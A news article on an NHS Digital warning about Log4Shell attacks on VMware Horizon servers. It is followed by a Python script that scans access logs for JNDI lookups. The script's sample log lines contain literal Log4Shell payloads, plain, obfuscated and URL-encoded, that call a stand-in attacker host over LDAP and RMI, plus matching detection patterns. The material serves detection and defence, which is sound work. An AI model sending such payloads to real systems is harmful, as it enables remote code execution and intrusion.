NHS warns of attackers targeting Log4j flaws in VMware Horizon
The UK’s National Health Service (NHS) Digital has issued a warning regarding attackers actively targeting the Log4j CVE-2021-44228 vulnerability in VMware Horizon servers to establish persistence.
Officials say the threat group is unknown. The observed attacks target the Log4j vulnerability in the Apache Tomcat service, which is integrated with VMware Horizon.
Their attack activity likely includes a reconnaissance phase, during which the attackers use Java Naming and Directory Interface (JNDI) lookups delivered via Log4Shell payloads to call back to malicious infrastructure, the NHS wrote in its review.
“Once a weakness has been identified, the attack then uses Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service,” the officials explained.
The attacker could then use this web shell to perform malicious actions such as deploying more malware, exfiltrating data, or launching a ransomware attack. In the advisory, the NHS noted that more VMware systems may be vulnerable and that businesses should review the VMSA-2021-0028 security advisory, VMware Response to Apache Log4j Remote Code Execution Vulnerability.
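As an added illustration of the reconnaissance stage described above (example code, not from the NHS advisory or VMware), the following Python scans Tomcat-style access-log lines for JNDI lookup strings, URL-decoding each line and collapsing the nested-lookup forms Log4j evaluates so that obfuscated attempts are flagged alongside plain ones. The IP addresses, hostnames and log lines are constructed samples.

```python
import re
from urllib.parse import unquote
from typing import Dict, List

# Constructed Tomcat-style access-log lines (sample data, not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jan/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [12/Jan/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://attacker.example/b}"
10.0.0.11 - - [12/Jan/2022:10:01:30 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.7 - - [12/Jan/2022:10:02:00 +0000] "GET /broker/xml HTTP/1.1" 200 88 "-" "VMware Horizon Client/8.0"
"""

# Nested lookups Log4j resolves before the outer ${...}: ${lower:x}, ${upper:x}, ${::-x}.
NESTED = re.compile(r"\$\{(?:(lower|upper):|(::-))([^${}]*)\}")
# A JNDI lookup using one of the protocol handlers abused by Log4Shell.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps|ldap|rmi|dns|iiop)\s*:", re.IGNORECASE)


def _unwrap(m: re.Match) -> str:
    kind, value = m.group(1), m.group(3)
    if kind == "lower":
        return value.lower()
    if kind == "upper":
        return value.upper()
    return value  # ${::-x} is an empty lookup whose default value is x


def normalize(line: str) -> str:
    """URL-decode the line, then collapse nested lookups until nothing changes."""
    text = unquote(line)
    previous = None
    while previous != text:
        previous = text
        text = NESTED.sub(_unwrap, text)
    return text


def find_jndi_lookups(log_text: str) -> List[Dict[str, str]]:
    """Return one record per log line that carries a JNDI lookup after normalization."""
    hits = []
    for line in log_text.splitlines():
        decoded = normalize(line)
        match = JNDI.search(decoded)
        if match:
            hits.append({"source_ip": line.split(" ", 1)[0],
                         "scheme": match.group(1).lower(),
                         "decoded": decoded})
    return hits
```

Running `find_jndi_lookups(SAMPLE_LOG)` flags the three probing lines (two LDAP, one RMI) and leaves the legitimate Horizon client traffic alone; the same function can be pointed at real Tomcat access logs.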